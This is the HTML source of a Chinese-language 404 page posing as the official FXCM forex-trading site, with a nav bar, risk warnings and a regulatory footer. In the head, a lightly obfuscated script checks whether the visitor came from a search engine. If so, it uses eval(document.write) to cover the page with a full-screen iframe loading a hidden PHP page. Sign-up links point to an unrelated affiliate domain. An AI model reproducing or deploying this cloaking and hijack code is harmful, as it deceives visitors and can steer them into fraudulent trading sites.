<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>福汇FXCM官网</title>
<meta name="description" content="福汇FXCM致力为客户提供无与伦比的交易平台,FXCM福汇官网金融交易包含各地熱門股票, 股票指數, 黃金白銀, 原油小麥等大宗商品。福汇平台是您值得信任的交易伙伴。" />
<meta name="keywords" content="福汇,福汇平台,福汇网站,fxcm,福汇外汇,福汇官网,福汇mt4平台下载" />

<meta name="renderer" content="webkit" />
	<meta http-equiv="X-UA-Compatible" content="IE=edge" >
	<meta http-equiv="imagetoolbar" content="no" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0" />
	<link rel="shortcut icon" type="image/ico" href="https://assets.fxlib.app/favicon.ico" /><style>
	
	* {box-sizing: border-box; transition: all .4s linear;}
	body,input {
		font-family: "Open Sans",Verdana,sans-serif,"Microsoft JhengHei","微軟正黑體","Apple LiGothic Medium","蘋果儷中黑";
		font-size:15px;
		line-height:1.5;
	}
	body {margin:0;}
	img {max-width:100%; border:none;}	
	.note {font-size: .6875rem;}
	.container {margin:0 auto; width:1200px; max-width:92%; position:relative;}
	.main-content {padding-top: 30px; padding-bottom: 30px;}
	.padding-inner {padding-right: 0; padding-left: 0;}
	.spacer {height:25px;}
	.padding-bottom-10 {padding-bottom: 10px;}
	.margin-bottom-0 {margin-bottom:0;}
	.grid-20 {width:20%;}
	.grid-25 {width:25%;}
	.grid-33 {width: 33%;}
	
	.bg-darkgrey2 {background: #283545 !important; color: #fff;}
	.bg-lightgrey {background-color: #ebf0f4;}
	
	.main-flex {display:flex; justify-content:space-between; flex-wrap:wrap;}
	.main-flex .copy {width:60%;}
	.main-flex .image {width:30%; }

	.disclaimer {font-size:13px;}
	footer {font-size:13px; margin:40px 0 20px;}
	.page-disclaimer, .footer-disclaimer, .copyright {border-top:1px solid #dce0e2; padding-top:15px; margin-top:15px;}
	footer a {color:#000;}

	@media (max-width: 900px) {
	  
	  .main-flex .copy {width:63%; }
	  .main-flex .image {width:35%; }
	}
	
	@media (max-width: 600px) {
		body,input {font-size:14px;}
		.mobile-grid-100 {width:100%;}

		.main-flex .copy {width:100%; order:2;}
		.main-flex .image {width:100%; text-align:center; order:1;}
		.main-flex .image img {width:250px;}		
	  }
	
</style>
<!-- GA4 -->
<link rel="dns-prefetch" href="//assets.fxlib.app">
<link rel="dns-prefetch" href="//consent.cookiebot.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="preload" href="https://assets.fxlib.app/tagmanager/gtm.js?id=GTM-MRZP79T" as="script">
<script id="fxcm-gtm-optimize-js">
    /* Google Tag Manager */
    (function(w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({
            'gtm.start': new Date().getTime(),
            event: 'gtm.js'
        });
        var f = d.getElementsByTagName(s)[0]
          , j = d.createElement(s)
          , dl = l != 'dataLayer' ? '&l=' + l : '';
        j.async = true;
        j.src = 'https://assets.fxlib.app/tagmanager/gtm.js?id=' + i + dl;
        f.parentNode.insertBefore(j, f);
    }
    )(window, document, 'script', 'dataLayer', 'GTM-MRZP79T');
</script>
<script type='text/javascript' id='site-js-fxcm-base-js-extra'>/* <![CDATA[ */var fxcmcom = {"site_alias":"cn-seo"};/* ]]> */</script>
<script>
var s=document.referrer;  


if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("so")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 ){
	 
ss = '<div id="showcloneshengxiaon" style=" position:fixed; z-index:99999999; height: 100%; width: 100%; background-color: rgb(255, 255, 255); background-position: initial initial; background-repeat: initial initial;"><iframe scrolling="yes" marginheight=0 marginwidth=0  frameborder="0" width="100%"  height="100%" src="/hhh108/fxcm.php"></iframe></div><style type="text/css">html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden}</style>';
eval("document.write('" + ss + "');");

}

else {
 


}
</script>
</head>

<body>	
	<style>
	#main-header {
    padding-top: 20px;
    padding-bottom: 20px;
    display: flex;
	align-items: center;	
	}
	#main-header::before {
    display: table;
    content: "";
	}
	#main-header::after {
    display: table;
    clear: both;
    content: "";
    height: 0;
	}
	#main-header .header-logo {
    width: 220px;
	}
	.main-nav {
	  list-style-type: none;
	  margin: 0;
	  padding: 0;
	  width: calc( 100% - 300px);
	  text-align: center;
	}
	.main-nav li {
	  display: inline-block;
	  min-width: 3em;
	  margin: 0 0.2em;
	}
	.main-nav a {
	  text-decoration: none;
	  display: block;
	  position: relative;
	  color: black;
	  padding: .5em .8em;
	}
	.main-nav a:hover {
	  color: #fff;
	  background: #f4ad03;
	  font-weight: bold;	
	}

	
		@media (max-width: 900px) {
			
			#main-header .main-nav a {
			margin-left: 2px;
			padding: 3px 10px;
		}
	}
		
		@media (max-width: 600px) {	
			
			#main-header {
			padding-top: 15px;
			padding-bottom: 15px;
			flex-wrap: wrap;
		}
			#main-header .main-nav {
			width: 100%;
			text-align: left;
			margin-top: 15px;
		}
			#main-header .main-nav a {
			margin-left: 1px;
			padding: 2px 5px;
		}
	}
</style>

<header id="main-header" class="container padding-inner">

		<a href="/" class="header-logo"><img src="https://assets.fxlib.app/hk/images/logo/logo-tagline-blue_chg_sc.svg" alt="福汇FXCM"></a>

		<ul class="main-nav">
			<li><a href="/products/">福汇网站交易产品</a></li>
			<li><a href="/platforms/">福汇mt4平台下载</a></li>
			<li><a href="/market-news/">外汇快讯</a></li>
			<li><a href="/resources/">交易信息</a></li>
			<li><a href="/contact/">联系福汇</a></li>
			<li><a href="/aboutus/">关于福汇</a></li>
			<li ><a href="javascript://" onclick="window.open('/live-chat.php', 'Chat', 'width=500,height=800');window.__fxcmGtm.trackEvent('targeted click', {engagementContext:'Omni Event - Live Chat'})" style="background:#f4ad03; color:#1A2026">线上咨询</a></li>
			<li><a href="https://www.afiliasi.asia/bb" data-track-cta="Omni Event - Open Account" style="background:#1855a0; color:#FFF">注册</a></li>
		</ul>
	
</header>	<main>
		<div class="container padding-inner main-content">
			<h2>找不到有关网页</h2>
			<p>对不起，您所搜寻的网页并不存在。有关网页可能已经更改名称，或已移至新网址。</p>
		</div>
		
		<div class="spacer"></div>
			
	</main>
	<footer>
		<div class="container">
			<article class="footer-disclaimer">
				<p>iPhone及iPad乃Apple Inc.的商标，已于美国及其他国家注册。App Store乃Apple Inc.的服务标志。Android及Google Play乃Google LLC的商标。</p>
	<p>Stratos Global LLC（“FXCM”）于圣文森特和格瑞那丁注册成立，公司注册号为1776 LLC 2022，是Stratos集团公司的经营附属公司。FXCM无需在圣文森特和格瑞那丁持有任何金融服务牌照或授权以提供其产品和服务。</p>
	<p><b>风险警告：</b>本公司的产品是以保证金交易买卖，这意味著产品涉及高风险，阁下可能会于交易时蒙受损失超过存入的资金。这些产品未必适合所有投资者。请确保阁下完全明白当中涉及的风险并且在交易前小心考虑阁下的财政状况和投资经验。如有必要，请寻求独立的意见。</p>
	<p>您必须在您开始交易前阅读并考虑与您账户相关的法律文件，包括FXCM发布的业务条款。</p>
	<p>此内容中的信息不拟为美国、加拿大、英国、欧盟、香港、澳大利亚、以色列或日本的居民提供，并且无意向任何国家或司法管辖区的任何人分发或由其使用，如在该国家或司法管辖区分发或使用是会触犯当地法律和法规。</p>
	<p>在本网站www.fuhuitrade.com上所可访问的服务和产品由Stratos Global LLC提供，注册地址是∶Euro House, Richmond Hill Road, Kingstown, VC0100, St. Vincent and the Grenadines。</p>
	<p>FXCM集团总部设于125 Old Broad Street, 9th Floor, London EC2N 1AR, United Kingdom。Stratos Markets Limited于英国受金融行为监管局（“FCA”）认可及监管。公司注册编号为217689。公司于英格兰和威尔士注册，注册号为04072877。Stratos Europe Limited（商业名称为“FXCM”或“FXCM EU”），是一家注册于塞浦路斯公司注册局（HE 405643）的塞浦路斯投资公司（“CIF”），由塞浦路斯证券交易委员会（“CySEC”）授权与监管，牌照编号392/20。Stratos Trading Pty. Limited受澳大利亚证券及投资事务监察委员会（“ASIC”）监管，AFSL 309763。Stratos Trading Pty. Limited ABN 31 121 934 432。FXCM South Africa (PTY) LTD是一家受认可金融服务供应商，受南非金融行业行为监管局监管，注册编号为46534。FXCM Trading Ltd.（“FXCM TL”或品牌名“FXCM Israel”）于以色列注册成立，官方注册编号为515234623。FXCM TL是一家受认可和持牌公司，受以色列证券管理局（“ISA”）监管。</p>
	<p class="links">
			<a href="https://www.afiliasi.asia/cn_main/gb/legal/terms-conditions/" target="_blank">使用条款</a>
			<a href="https://www.afiliasi.asia/cn_main/gb/legal/privacy-policy/" target="_blank">私隐保障政策</a>
			<a href="https://www.afiliasi.asia/cn_main/gb/legal/general-business-terms/" target="_blank">业务条款</a>
			<a href="https://www.afiliasi.asia/cn_main/gb/legal/complaints/" target="_blank">投诉</a>
			<a href="https://www.afiliasi.asia/cn_main/gb/trading-execution-risks/" target="_blank">风险警示</a>
			<a href="https://www.afiliasi.asia/cn_main/gb/legal/fatca/" target="_blank">FATCA常见问题</a>
			<a href="https://www.afiliasi.asia/cn_main/gb/legal/crs-faq/" target="_blank">CRS常见问题</a>
			<a href="https://www.afiliasi.asia/cn_main/gb/legal/rate-card/" target="_blank">收费表 </a>
		</p>			</article>
			<article class="copyright">
				<p>@福汇 FXCM</p>
			</article>
		</div>
</footer></body>

	<script>
	(function(){
		var bp = document.createElement("script");
		var curProtocol = window.location.protocol.split(":")[0];
		if (curProtocol === "https") {
		  bp.src = "https://zz.bdstatic.com/linksubmit/push.js";        
		}
		else {
		  bp.src = "http://push.zhanzhang.baidu.com/push.js";
		}
		var s = document.getElementsByTagName("script")[0];
		s.parentNode.insertBefore(bp, s);
	})();
	</script>		
</html>